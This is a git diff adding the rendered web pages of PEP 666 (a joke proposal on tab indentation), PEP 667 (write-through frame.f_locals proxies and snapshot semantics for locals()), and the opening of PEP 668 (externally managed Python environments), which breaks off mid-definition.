+ + + + + \ No newline at end of file diff --git a/pep-0666/index.html b/pep-0666/index.html new file mode 100644 index 00000000000..5f852d3cdd5 --- /dev/null +++ b/pep-0666/index.html @@ -0,0 +1,210 @@ + + + + + + + + PEP 666 – Reject Foolish Indentation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 666 – Reject Foolish Indentation

+
+
Author:
+
Laura Creighton <lac at strakt.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
03-Dec-2001
+
Python-Version:
+
2.2
+
Post-History:
+
05-Dec-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

Everybody agrees that mixing tabs and spaces is a bad idea. Some +people want more than this. I propose that we let people define +whatever Python behaviour they want, so it will only run the way +they like it, and will not run the way they don’t like it. We +will do this with a command line switch. Programs that aren’t +formatted the way the programmer wants things will raise +IndentationError.

+
    +
  • python -TNone will refuse to run when there are any tabs.
  • +
  • python -Tn will refuse to run when tabs are not exactly n spaces
  • +
  • python -TOnly will refuse to run when blocks are indented by anything +other than tabs
  • +
+

People who mix tabs and spaces, naturally, will find that their +programs do not run. Alas, we haven’t found a way to give them an +electric shock as from a cattle prod remotely. (Though if somebody +finds out a way to do this, I will be pleased to add this option to +the PEP.)

+
+
+

Rationale

+

Python-list@python.org (a.k.a. comp.lang.python) is periodically +awash with discussions about tabs and spaces. This is inevitable, +given that indentation is syntactically significant in Python. +This has never solved anything, and just makes various people +frustrated and angry. Eventually they start saying rude things to +each other which is sad for all of us. And it is also sad that +they are wasting their valuable time which they could spend +creating something with Python. Moreover, for the Python community +as a whole, from a public relations point of view, this is quite +unfortunate. The people who aren’t posting about tabs and spaces, +are, (unsurprisingly) invisible, while the people who are posting +make the rest of us look somewhat foolish.

+

The problem is that there is no polite way to say ‘Stop wasting +your valuable time and mine.’ People who are already in the middle +of a flame war are not well disposed to believe that you are acting +out of compassion for them, and quite rightly insist that their own +time is their own to do with as they please. They are stuck like +flies in treacle in this wretched argument, and it is self-evident +that they cannot disengage or they would have already done so.

+

But today I had to spend time cleaning my keyboard because the ‘n’ +key is sticking. So, in addition to feeling compassion for these +people, I am pretty annoyed. I figure if I make this PEP, we can +then ask Guido to quickly reject it, and then when this argument +next starts up again, we can say ‘Guido isn’t changing things to +suit the tab-haters or the only-tabbers, so this conversation is a +waste of time.’ Then everybody can quietly believe that a) they +are correct and b) other people are fools and c) they are +undeniably fortunate to not have to share a lab with idiots, (which +is something the arguers could do _now_, but apparently have +forgotten).

+

And python-list can go back to worrying if it is too smug, rather +than whether it is too hostile for newcomers. Possibly somebody +could get around to explaining to me what is the difference between +__getattr__ and __getattribute__ in non-Classic classes in 2.2, a +question I have foolishly posted in the middle of the current tab +thread. I would like to know the answer to that question [1].

+

This proposal, if accepted, will probably mean a heck of a lot of +work for somebody. But since I don’t want it accepted, I don’t +care.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0666.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0667/index.html b/pep-0667/index.html new file mode 100644 index 00000000000..e43320921e6 --- /dev/null +++ b/pep-0667/index.html @@ -0,0 +1,981 @@ + + + + + + + + PEP 667 – Consistent views of namespaces | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 667 – Consistent views of namespaces

+
+
Author:
+
Mark Shannon <mark at hotpy.org>, +Tian Gao <gaogaotiantian at hotmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
30-Jul-2021
+
Python-Version:
+
3.13
+
Post-History:
+
20-Aug-2021, 22-Feb-2024
+
Resolution:
+
25-Apr-2024
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at locals().

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

In early versions of Python all namespaces, whether in functions, +classes or modules, were all implemented the same way: as a dictionary.

+

For performance reasons, the implementation of function namespaces was +changed. Unfortunately this meant that accessing these namespaces through +locals() and frame.f_locals ceased to be consistent and some +odd bugs crept in over the years as threads, generators and coroutines +were added.

+

This PEP proposes making these namespaces consistent once more. +Modifications to frame.f_locals will always be visible in +the underlying variables. Modifications to local variables will +immediately be visible in frame.f_locals, and they will be +consistent regardless of threading or coroutines.

+

The locals() function will act the same as it does now for class +and modules scopes. For function scopes it will return an instantaneous +snapshot of the underlying frame.f_locals rather than implicitly +refreshing a single shared dictionary cached on the frame object.

+
+
+

Motivation

+

The implementation of locals() and frame.f_locals in releases up to and +including Python 3.12 is slow, inconsistent and buggy. +We want to make it faster, consistent, and most importantly fix the bugs.

+

For example, when attempting to manipulate local variables via frame objects:

+
class C:
+    x = 1
+    sys._getframe().f_locals['x'] = 2
+    print(x)
+
+
+

prints 2, but:

+
def f():
+    x = 1
+    sys._getframe().f_locals['x'] = 2
+    print(x)
+f()
+
+
+

prints 1.

+

This is inconsistent, and confusing. Worse than that, the Python 3.12 behavior can +result in strange bugs.

+

With this PEP both examples would print 2 as the function level +change would be written directly to the optimized local variables in +the frame rather than to a cached dictionary snapshot.

+

There are no compensating advantages for the Python 3.12 behavior; +it is unreliable and slow.

+

The locals() builtin has its own undesirable behaviours. Refer to PEP 558 +for additional details on those concerns.

+
+
+

Rationale

+
+

Making the frame.f_locals attribute a write-through proxy

+

The Python 3.12 implementation of frame.f_locals returns a dictionary +that is created on the fly from the array of local variables. The +PyFrame_LocalsToFast() C API is then called by debuggers and trace +functions that want to write their changes back to the array (until +Python 3.11, this API was called implicitly after every trace function +invocation rather than being called explicitly by the trace functions).

+

This can result in the array and dictionary getting out of sync with +each other. Writes to the f_locals frame attribute may not show up as +modifications to local variables if PyFrame_LocalsToFast() is never +called. Writes to local variables can get lost if a dictionary snapshot +created before the variables were modified is written back to the frame +(since every known variable stored in the snapshot is written back to +the frame, even if the value stored on the frame had changed since the +snapshot was taken).

+

By making frame.f_locals return a view on the +underlying frame, these problems go away. frame.f_locals is always in +sync with the frame because it is a view of it, not a copy of it.

+
+
+

Making the locals() builtin return independent snapshots

+

PEP 558 considered three potential options for standardising the behavior of the +locals() builtin in optimized scopes:

+
    +
  • retain the historical behaviour of having each call to locals() on a given frame +update a single shared snapshot of the local variables
  • +
  • make locals() return write-through proxy instances (similar +to frame.f_locals)
  • +
  • make locals() return genuinely independent snapshots so that +attempts to change the values of local variables via exec() +would be consistently ignored rather than being accepted in some circumstances
  • +
+

The last option was chosen as the one which could most easily be explained in the +language reference, and memorised by users:

+
    +
  • the locals() builtin gives an instantaneous snapshot of the local variables in +optimized scopes, and read/write access in other scopes; and
  • +
  • frame.f_locals gives read/write access to the local variables in all scopes, +including optimized scopes
  • +
+

This approach allows the intent of a piece of code to be clearer than it would be if both +APIs granted full read/write access in optimized scopes, even when write access wasn’t +needed or desired. For additional details on this design decision, refer to PEP 558, +especially the Motivation section and Additional considerations for eval() and exec() in optimized scopes.

+

This approach is not without its drawbacks, which are covered +in the Backwards Compatibility section below.

+
+
+
+

Specification

+
+

Python API

+
+

The frame.f_locals attribute

+

For module and class scopes (including exec() and eval() +invocations), frame.f_locals is a direct +reference to the local variable namespace used in code execution.

+

For function scopes (and other optimized scopes) +it will be an instance of a new write-through proxy type that can directly modify +the optimized local variable storage array in the underlying frame, as well as the +contents of any cell references to non-local variables.

+

The view objects fully implement the collections.abc.Mapping interface, +and also implement the following mutable mapping operations:

+
    +
  • using assignment to add new key/value pairs
  • +
  • using assignment to update the value associated with a key
  • +
  • conditional assignment via the setdefault() method
  • +
  • bulk updates via the update() method
  • +
+

Views of different frames compare unequal even if they have the same contents.

+

All writes to the f_locals mapping will be immediately visible +in the underlying variables. All changes to the underlying variables +will be immediately visible in the mapping.

+

The f_locals object will be a full mapping, and can have arbitrary +key-value pairs added to it. New names added via the proxies +will be stored in a dedicated shared dictionary stored on the +underlying frame object (so all proxy instances for a given frame +will be able to access any names added this way).

+

Extra keys (which do not correspond to local variables on the underlying +frame) may be removed as usual with del statements or the pop() +method.

+

Using del, or the pop() method, to remove keys that correspond to local +variables on the underlying frame is NOT supported, and attempting to do so +will raise ValueError. +Local variables can only be set to None (or some other value) via the proxy, +they cannot be unbound completely.

+

The clear() method is NOT implemented on the write-through proxies, as it +is unclear how it should handle the inability to delete entries corresponding +to local variables.

+

To maintain backwards compatibility, proxy APIs that need to produce a +new mapping (such as copy()) will produce regular builtin dict +instances, rather than write-through proxy instances.

+

To avoid introducing a circular reference between frame objects and the +write-through proxies, each access to frame.f_locals returns a new +write-through proxy instance.

+
+
+

The locals() builtin

+

locals() will be defined as:

+
def locals():
+    frame = sys._getframe(1)
+    f_locals = frame.f_locals
+    if frame._is_optimized(): # Not an actual frame method
+        f_locals = dict(f_locals)
+    return f_locals
+
+
+

For module and class scopes (including exec() and eval() +invocations), locals() continues to return a direct +reference to the local variable namespace used in code execution +(which is also the same value reported by frame.f_locals).

+

In optimized scopes, +each call to locals() will produce an independent +snapshot of the local variables.

+
+
+

The eval() and exec() builtins

+

Because this PEP changes the behavior of locals(), the +behavior of eval() and exec() also changes.

+

Assuming a function _eval() which performs the job of +eval() with explicit namespace arguments, eval() +can be defined as follows:

+
FrameProxyType = type((lambda: sys._getframe().f_locals)())
+
+def eval(expression, /, globals=None, locals=None):
+    if globals is None:
+        # No globals -> use calling frame's globals
+        _calling_frame = sys._getframe(1)
+        globals = _calling_frame.f_globals
+        if locals is None:
+            # No globals or locals -> use calling frame's locals
+            locals = _calling_frame.f_locals
+            if isinstance(locals, FrameProxyType):
+                # Align with locals() builtin in optimized frame
+                locals = dict(locals)
+    elif locals is None:
+        # Globals but no locals -> use same namespace for both
+        locals = globals
+    return _eval(expression, globals, locals)
+
+
+

The specified argument handling for exec() is similarly updated.

+

(In Python 3.12 and earlier, it was not possible to provide locals +to eval() or exec() without also providing globals as these +were previously positional-only arguments. Independently of this +PEP, Python 3.13 updated these builtins to accept keyword arguments)

+
+
+
+

C API

+
+

Additions to the PyEval C API

+

Three new C-API functions will be added:

+
PyObject *PyEval_GetFrameLocals(void)
+PyObject *PyEval_GetFrameGlobals(void)
+PyObject *PyEval_GetFrameBuiltins(void)
+
+
+

PyEval_GetFrameLocals() is equivalent to: locals(). +PyEval_GetFrameGlobals() is equivalent to: globals().

+

All of these functions will return a new reference.

+
+
+

PyFrame_GetLocals C API

+

The existing PyFrame_GetLocals(f) C API is equivalent to f.f_locals. +Its return value will be as described above for accessing f.f_locals.

+

This function returns a new reference, so it is able to accommodate the +creation of a new write-through proxy instance on each call in an +optimized scope.

+
+
+

Deprecated C APIs

+

The following C API functions will be deprecated, as they return borrowed references:

+
PyEval_GetLocals()
+PyEval_GetGlobals()
+PyEval_GetBuiltins()
+
+
+

The following functions (which return new references) should be used instead:

+
PyEval_GetFrameLocals()
+PyEval_GetFrameGlobals()
+PyEval_GetFrameBuiltins()
+
+
+

The following C API functions will become no-ops, and will be deprecated without +replacement:

+
PyFrame_FastToLocalsWithError()
+PyFrame_FastToLocals()
+PyFrame_LocalsToFast()
+
+
+

All of the deprecated functions will be marked as deprecated in the Python 3.13 documentation.

+

Of these functions, only PyEval_GetLocals() poses any significant maintenance burden. +Accordingly, calls to PyEval_GetLocals() will emit DeprecationWarning in Python +3.14, with a target removal date of Python 3.16 (two releases after Python 3.14). +Alternatives are recommended as described in PyEval_GetLocals compatibility.

+
+
+
+
+

Summary of Changes

+

This section summarises how the specified behaviour in Python 3.13 and later +differs from the historical behaviour in Python 3.12 and earlier versions.

+
+

Python API changes

+
+

frame.f_locals changes

+

Consider the following example:

+
def l():
+    "Get the locals of caller"
+    return sys._getframe(1).f_locals
+
+def test():
+    if 0: y = 1 # Make 'y' a local variable
+    x = 1
+    l()['x'] = 2
+    l()['y'] = 4
+    l()['z'] = 5
+    y
+    print(locals(), x)
+
+
+

Given the changes in this PEP, +test() will print {'x': 2, 'y': 4, 'z': 5} 2.

+

In Python 3.12, this example will fail with an UnboundLocalError, +as the definition of y by l()['y'] = 4 is lost.

+

If the second-to-last line were changed from y to z, this will still +raise NameError, as it does in Python 3.12. +Keys added to frame.f_locals that are not lexically local variables +remain visible in frame.f_locals, +but do not dynamically become local variables.

+
+
+

locals() changes

+

Consider the following example:

+
def f():
+    exec("x = 1")
+    print(locals().get("x"))
+f()
+
+
+

Given the changes in this PEP, this will always print None +(regardless of whether x is a defined local variable in the function), +as the explicit call to locals() produces a distinct snapshot from +the one implicitly used in the exec() call.

+

In Python 3.12, the exact example shown would print 1, but seemingly +unrelated changes to the definition of the function involved could make +it print None instead (Additional considerations for eval() and exec() in optimized scopes in PEP 558 +goes into more detail on that topic).

+
+
+

eval() and exec() changes

+

The primary change affecting eval() and exec() is shown +in the “locals() changes” example: repeatedly +accessing locals() in an optimized scope will no longer +implicitly share a common underlying namespace.

+
+
+
+

C API changes

+
+

PyFrame_GetLocals change

+

PyFrame_GetLocals can already return arbitrary mappings in Python 3.12, +as exec() and eval() accept arbitrary mappings as their locals argument, +and metaclasses may return arbitrary mappings from their __prepare__ methods.

+

Returning a frame locals proxy in optimized scopes just adds another case where +something other than a builtin dictionary will be returned.

+
+
+

PyEval_GetLocals change

+

The semantics of PyEval_GetLocals() are technically unchanged, but they do change in +practice as the dictionary cached on optimized frames is no longer shared with other +mechanisms for accessing the frame locals (locals() builtin, PyFrame_GetLocals +function, frame f_locals attributes).

+
+
+
+
+

Backwards Compatibility

+
+

Python API compatibility

+

The implementation used in versions up to and including Python 3.12 has many +corner cases and oddities. Code that works around those may need to be changed. +Code that uses locals() for simple templating, or print debugging, +will continue to work correctly. Debuggers and other tools that use +f_locals to modify local variables, will now work correctly, +even in the presence of threaded code, coroutines and generators.

+
+
+

frame.f_locals compatibility

+

Although f.f_locals behaves as if it were the namespace of the function, +there will be some observable differences. +For example, f.f_locals is f.f_locals will be False for optimized +frames, as each access to the attribute produces a new write-through proxy +instance.

+

However f.f_locals == f.f_locals will be True, and +all changes to the underlying variables, by any means, including the +addition of new variable names as mapping keys, will always be visible.

+
+

locals() compatibility

+

locals() is locals() will be False for optimized frames, so +code like the following will raise KeyError instead of returning +1:

+
def f():
+    locals()["x"] = 1
+    return locals()["x"]
+
+
+

To continue working, such code will need to explicitly store the namespace +to be modified in a local variable, rather than relying on the previous +implicit caching on the frame object:

+
def f():
+    ns = {}
+    ns["x"] = 1
+    return ns["x"]
+
+
+

While this technically isn’t a formal backwards compatibility break +(since the behaviour of writing back to locals() was explicitly +documented as undefined), there is definitely some code that relies +on the existing behaviour. Accordingly, the updated behaviour will +be explicitly noted in the documentation as a change and it will be +covered in the Python 3.13 porting guide.

+

To work with a copy of locals() in optimized scopes on all +versions without making redundant copies on Python 3.13+, users +will need to define a version-dependent helper function that only +makes an explicit copy on Python versions prior to Python 3.13:

+
if sys.version_info >= (3, 13):
+    def _ensure_func_snapshot(d):
+        return d # 3.13+ locals() already returns a snapshot
+else:
+    def _ensure_func_snapshot(d):
+        return dict(d) # Create snapshot on older versions
+
+def f():
+    ns = _ensure_func_snapshot(locals())
+    ns["x"] = 1
+    return ns
+
+
+

In other scopes, locals().copy() can continue to be called +unconditionally without introducing any redundant copies.

+
+
+

Impact on exec() and eval()

+

Even though this PEP does not modify exec() or eval() directly, +the semantic change to locals() impacts the behavior of exec() +and eval() as they default to running code in the calling namespace.

+

This poses a potential compatibility issue for some code, as with the +previous implementation that returns the same dict when locals() is called +multiple times in function scope, the following code usually worked due to +the implicitly shared local variable namespace:

+
def f():
+    exec('a = 0')  # equivalent to exec('a = 0', globals(), locals())
+    exec('print(a)')  # equivalent to exec('print(a)', globals(), locals())
+    print(locals())  # {'a': 0}
+    # However, print(a) will not work here
+f()
+
+
+

With the semantic changes to locals() in this PEP, the exec('print(a)')' call +will fail with NameError, and print(locals()) will report an empty dictionary, as +each line will be using its own distinct snapshot of the local variables rather than +implicitly sharing a single cached snapshot stored on the frame object.

+

A shared namespace across exec() calls can still be obtained by using explicit +namespaces rather than relying on the previously implicitly shared frame namespace:

+
def f():
+    ns = {}
+    exec('a = 0', locals=ns)
+    exec('print(a)', locals=ns)  # 0
+f()
+
+
+

You can even reliably change the variables in the local scope by explicitly using +frame.f_locals, which was not possible before (even using ctypes to +invoke PyFrame_LocalsToFast was subject to the state inconsistency problems +discussed elsewhere in this PEP):

+
def f():
+    a = None
+    exec('a = 0', locals=sys._getframe().f_locals)
+    print(a)  # 0
+f()
+
+
+

The behavior of exec() and eval() for module and class scopes (including +nested invocations) is not changed, as the behaviour of locals() in those +scopes is not changing.

+
+
+

Impact on other code execution APIs in the standard library

+

pdb and bdb use the frame.f_locals API, and hence will be able to +reliably update local variables even in optimized frames. Implementing this +PEP will resolve several longstanding bugs in these modules relating to threads, +generators, coroutines, and other mechanisms that allow concurrent code execution +while the debugger is active.

+

Other code execution APIs in the standard library (such as the code module) +do not implicitly access locals() or frame.f_locals, but the behaviour +of explicitly passing these namespaces will change as described in the rest of +this PEP (passing locals() in optimized scopes will no longer implicitly +share the code execution namespace across calls, passing frame.f_locals +in optimized scopes will allow reliable modification of local variables and +nonlocal cell references).

+
+
+
+

C API compatibility

+
+

PyEval_GetLocals compatibility

+

PyEval_GetLocals() has never historically distinguished between whether it was +emulating locals() or sys._getframe().f_locals at the Python level, as they all +returned references to the same shared cache of the local variable bindings.

+

With this PEP, locals() changes to return independent snapshots on each call for +optimized frames, and frame.f_locals (along with PyFrame_GetLocals) changes to +return new write-through proxy instances.

+

Because PyEval_GetLocals() returns a borrowed reference, it isn’t possible to update +its semantics to align with either of those alternatives, leaving it as the only remaining +API that requires a shared cache dictionary stored on the frame object.

+

While this technically leaves the semantics of the function unchanged, it no longer allows +extra dict entries to be made visible to users of the other APIs, as those APIs are no longer +accessing the same underlying cache dictionary.

+

When PyEval_GetLocals() is being used as an equivalent to the Python locals() +builtin, PyEval_GetFrameLocals() should be used instead.

+

This code:

+
locals = PyEval_GetLocals();
+if (locals == NULL) {
+    goto error_handler;
+}
+Py_INCREF(locals);
+
+
+

should be replaced with:

+
// Equivalent to "locals()" in Python code
+locals = PyEval_GetFrameLocals();
+if (locals == NULL) {
+    goto error_handler;
+}
+
+
+

When PyEval_GetLocals() is being used as an equivalent to calling +sys._getframe().f_locals in Python, it should be replaced by calling +PyFrame_GetLocals() on the result of PyEval_GetFrame().

+

In these cases, the original code should be replaced with:

+
// Equivalent to "sys._getframe()" in Python code
+frame = PyEval_GetFrame();
+if (frame == NULL) {
+    goto error_handler;
+}
+// Equivalent to "frame.f_locals" in Python code
+locals = PyFrame_GetLocals(frame);
+frame = NULL; // Minimise visibility of borrowed reference
+if (locals == NULL) {
+    goto error_handler;
+}
+
+
+
+
+
+

Impact on PEP 709 inlined comprehensions

+

For inlined comprehensions within a function, locals() currently behaves the +same inside or outside of the comprehension, and this will not change. The +behavior of locals() inside functions will generally change as specified in +the rest of this PEP.

+

For inlined comprehensions at module or class scope, calling locals() within +the inlined comprehension returns a new dictionary for each call. This PEP will +make locals() within a function also always return a new dictionary for each +call, improving consistency; class or module scope inlined comprehensions will +appear to behave as if the inlined comprehension is still a distinct function.

+
+
+
+

Implementation

+

Each read of frame.f_locals will create a new proxy object that gives +the appearance of being the mapping of local (including cell and free) +variable names to the values of those local variables.

+

A possible implementation is sketched out below. +All attributes that start with an underscore are invisible and +cannot be accessed directly. +They serve only to illustrate the proposed design.

+
NULL: Object # NULL is a singleton representing the absence of a value.
+
+class CodeType:
+
+    _name_to_offset_mapping_impl: dict | NULL
+    _cells: frozenset # Set of indexes of cell and free variables
+    ...
+
+    def __init__(self, ...):
+        self._name_to_offset_mapping_impl = NULL
+        self._variable_names = deduplicate(
+            self.co_varnames + self.co_cellvars + self.co_freevars
+        )
+        ...
+
+    @property
+    def _name_to_offset_mapping(self):
+        "Mapping of names to offsets in local variable array."
+        if self._name_to_offset_mapping_impl is NULL:
+            self._name_to_offset_mapping_impl = {
+                name: index for (index, name) in enumerate(self._variable_names)
+            }
+        return self._name_to_offset_mapping_impl
+
+class FrameType:
+
+    _locals : array[Object] # The values of the local variables, items may be NULL.
+    _extra_locals: dict | NULL # Dictionary for storing extra locals not in _locals.
+    _locals_cache: FrameLocalsProxy | NULL # required to support PyEval_GetLocals()
+
+    def __init__(self, ...):
+        self._extra_locals = NULL
+        self._locals_cache = NULL
+        ...
+
+    @property
+    def f_locals(self):
+        return FrameLocalsProxy(self)
+
+class FrameLocalsProxy:
+    "Implements collections.MutableMapping."
+
+    __slots__ = ("_frame", )
+
+    def __init__(self, frame:FrameType):
+        self._frame = frame
+
+    def __getitem__(self, name):
+        f = self._frame
+        co = f.f_code
+        if name in co._name_to_offset_mapping:
+            index = co._name_to_offset_mapping[name]
+            val = f._locals[index]
+            if val is NULL:
+                raise KeyError(name)
+            if index in co._cells
+                val = val.cell_contents
+                if val is NULL:
+                    raise KeyError(name)
+            return val
+        else:
+            if f._extra_locals is NULL:
+                raise KeyError(name)
+            return f._extra_locals[name]
+
+    def __setitem__(self, name, value):
+        f = self._frame
+        co = f.f_code
+        if name in co._name_to_offset_mapping:
+            index = co._name_to_offset_mapping[name]
+            kind = co._local_kinds[index]
+            if index in co._cells
+                cell = f._locals[index]
+                cell.cell_contents = val
+            else:
+                f._locals[index] = val
+        else:
+            if f._extra_locals is NULL:
+                f._extra_locals = {}
+            f._extra_locals[name] = val
+
+    def __iter__(self):
+        f = self._frame
+        co = f.f_code
+        yield from iter(f._extra_locals)
+        for index, name in enumerate(co._variable_names):
+            val = f._locals[index]
+            if val is NULL:
+                continue
+            if index in co._cells:
+                val = val.cell_contents
+                if val is NULL:
+                    continue
+            yield name
+
+    def __contains__(self, item):
+        f = self._frame
+        if item in f._extra_locals:
+            return True
+        return item in co._variable_names
+
+    def __len__(self):
+        f = self._frame
+        co = f.f_code
+        res = 0
+        for index, _ in enumerate(co._variable_names):
+            val = f._locals[index]
+            if val is NULL:
+                continue
+            if index in co._cells:
+                if val.cell_contents is NULL:
+                    continue
+            res += 1
+        return len(self._extra_locals) + res
+
+
+
+

C API

+

PyEval_GetLocals() will be implemented roughly as follows:

+
PyObject *PyEval_GetLocals(void) {
+    PyFrameObject * = ...; // Get the current frame.
+    if (frame->_locals_cache == NULL) {
+        frame->_locals_cache = PyEval_GetFrameLocals();
+    } else {
+        PyDict_Update(frame->_locals_cache, PyFrame_GetLocals(frame));
+    }
+    return frame->_locals_cache;
+}
+
+
+

As with all functions that return a borrowed reference, care must be taken to +ensure that the reference is not used beyond the lifetime of the object.

+
+
+
+

Implementation Notes

+

When accepted, the PEP text suggested that PyEval_GetLocals would start returning a +cached instance of the new write-through proxy, while the implementation sketch indicated +it would continue to return a dictionary snapshot cached on the frame instance. This +discrepancy was identified while implementing the PEP, and +resolved by the Steering Council +in favour of retaining the Python 3.12 behaviour of returning a dictionary snapshot +cached on the frame instance. +The PEP text has been updated accordingly.

+

During the discussions of the C API clarification, it also became apparent that the +rationale behind locals() being updated to return independent snapshots in +optimized scopes wasn’t clear, as it had been inherited +from the original PEP 558 discussions rather than being independently covered in this +PEP. The PEP text has been updated to better cover this change, with additional updates +to the Specification and Backwards Compatibility sections to cover the impact on code +execution APIs that default to executing code in the locals() namespace. Additional +motivation and rationale details have also been added to PEP 558.

+

In 3.13.0, the write-through proxies did not allow deletion of even extra variables +with del and pop(). This was subsequently reported as a +compatibility regression, +and resolved as now described +in The frame.f_locals attribute.

+
+
+

Comparison with PEP 558

+

This PEP and PEP 558 shared a common goal: +to make the semantics of locals() and frame.f_locals() +intelligible, and their operation reliable.

+

The key difference between this PEP and PEP 558 is that +PEP 558 attempted to store extra variables inside a full +internal dictionary copy of the local variables in an effort +to improve backwards compatibility with the legacy +PyEval_GetLocals() API, whereas this PEP does not (it stores +the extra local variables in a dedicated dictionary accessed +solely via the new frame proxy objects, and copies them to the +PyEval_GetLocals() shared dict only when requested).

+

PEP 558 did not specify exactly when that internal copy was +updated, making the behavior of PEP 558 impossible to reason +about in several cases where this PEP remains well specified.

+

PEP 558 also proposed the introduction of some additional Python +scope introspection interfaces to the C API that would allow +extension modules to more easily determine whether the currently +active Python scope is optimized or not, and hence whether +the C API’s locals() equivalent returns a direct reference +to the frame’s local execution namespace or a shallow copy of +the frame’s local variables and nonlocal cell references. +Whether or not to add such introspection APIs is independent +of the proposed changes to locals() and frame.f_locals +and hence no such proposals have been included in this PEP.

+

PEP 558 was +ultimately withdrawn +in favour of this PEP.

+
+
+

Reference Implementation

+

The implementation is in development as a draft pull request on GitHub.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0667.rst

+

Last modified: 2024-10-27 07:11:46 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0668/index.html b/pep-0668/index.html new file mode 100644 index 00000000000..c27b5086704 --- /dev/null +++ b/pep-0668/index.html @@ -0,0 +1,1162 @@ + + + + + + + + PEP 668 – Marking Python base environments as “externally managed” | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 668 – Marking Python base environments as “externally managed”

+
+
Author:
+
Geoffrey Thomas <geofft at ldpreload.com>, +Matthias Klose <doko at ubuntu.com>, +Filipe Laíns <lains at riseup.net>, +Donald Stufft <donald at stufft.io>, +Tzu-ping Chung <uranusjr at gmail.com>, +Stefano Rivera <stefanor at debian.org>, +Elana Hashman <ehashman at debian.org>, +Pradyun Gedam <pradyunsg at gmail.com>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
18-May-2021
+
Post-History:
+
28-May-2021
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Externally Managed Environments, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

A long-standing practical problem for Python users has been conflicts +between OS package managers and Python-specific package management +tools like pip. These conflicts include both Python-level API +incompatibilities and conflicts over file ownership.

+

Historically, Python-specific package management tools have defaulted +to installing packages into an implicit global context. With the +standardization and popularity of virtual environments, a better +solution for most (but not all) use cases is to use Python-specific +package management tools only within a virtual environment.

+

This PEP proposes a mechanism for a Python installation to communicate +to tools like pip that its global package installation context is +managed by some means external to Python, such as an OS package +manager. It specifies that Python-specific package management tools +should neither install nor remove packages into the interpreter’s +global context, by default, and should instead guide the end user +towards using a virtual environment.

+

It also standardizes an interpretation of the sysconfig schemes so +that, if a Python-specific package manager is about to install a +package in an interpreter-wide context, it can do so in a manner that +will avoid conflicting with the external package manager and reduces +the risk of breaking software shipped by the external package manager.

+
+
+

Terminology

+

A few terms used in this PEP have multiple meanings in the contexts +that it spans. For clarity, this PEP uses the following terms in +specific ways:

+
+
distro
Short for “distribution,” a collection of various sorts of +software, ideally designed to work properly together, including +(in contexts relevant to this document) the Python interpreter +itself, software written in Python, and software written in other +languages. That is, this is the sense used in phrases such as +“Linux distro” or “Berkeley Software Distribution.”

A distro can be an operating system (OS) of its own, such as +Debian, Fedora, or FreeBSD. It can also be an overlay distribution +that installs on top of an existing OS, such as Homebrew or +MacPorts.

+

This document uses the short term “distro,” because the term +“distribution” has another meaning in Python packaging contexts: a +source or binary distribution package of a single piece of Python +language software, that is, in the sense of +setuptools.dist.Distribution or “sdist”. To avoid confusion, +this document does not use the plain term “distribution” at all. +In the Python packaging sense, it uses the full phrase +“distribution package” or just “package” (see below).

+

The provider of a distro - the team or company that collects and +publishes the software and makes any needed modifications - is its +distributor.

+
+
package
A unit of software that can be installed and used within Python. +That is, this refers to what Python-specific packaging tools tend +to call a “distribution package” or simply a “distribution”; +the colloquial abbreviation “package” is used in the sense of the +Python Package Index.

This document does not use “package” in the sense of an importable +name that contains Python modules, though in many cases, a +distribution package consists of a single importable package of +the same name.

+

This document generally does not use the term “package” to refer +to units of installation by a distro’s package manager (such as +.deb or .rpm files). When needed, it uses phrasing such as +“a distro’s package.” (Again, in many cases, a Python package is +shipped inside a distro’s package named something like python- +plus the Python package name.)

+
+
Python-specific package manager
A tool for installing, upgrading, and/or removing Python packages +in a manner that conforms to Python packaging standards (such as +PEP 376 and PEP 427). The most popular Python-specific package +manager is pip [1]; other examples include the old Easy +Install command [2] as well as direct usage of a +setup.py command.

(Conda [3] is a bit of a special case, as the conda +command can install much more than just Python packages, making it +more like a distro package manager in some senses. Since the +conda command generally only operates on Conda-created +environments, most of the concerns in this document do not apply +to conda when acting as a Python-specific package manager.)

+
+
distro package manager
A tool for installing, upgrading, and/or removing a distro’s +packages in an installed instance of that distro, which is capable +of installing Python packages as well as non-Python packages, and +therefore generally has its own database of installed software +unrelated to PEP 376. Examples include apt, dpkg, dnf, +rpm, pacman, and brew. The salient feature is that if +a package was installed by a distro package manager, removing or +upgrading it in a way that would satisfy a Python-specific package +manager will generally leave a distro package manager in an +inconsistent state.

This document also uses phrases like “external package manager” or +“system’s package manager” to refer to a distro package manager in +certain contexts.

+
+
shadow
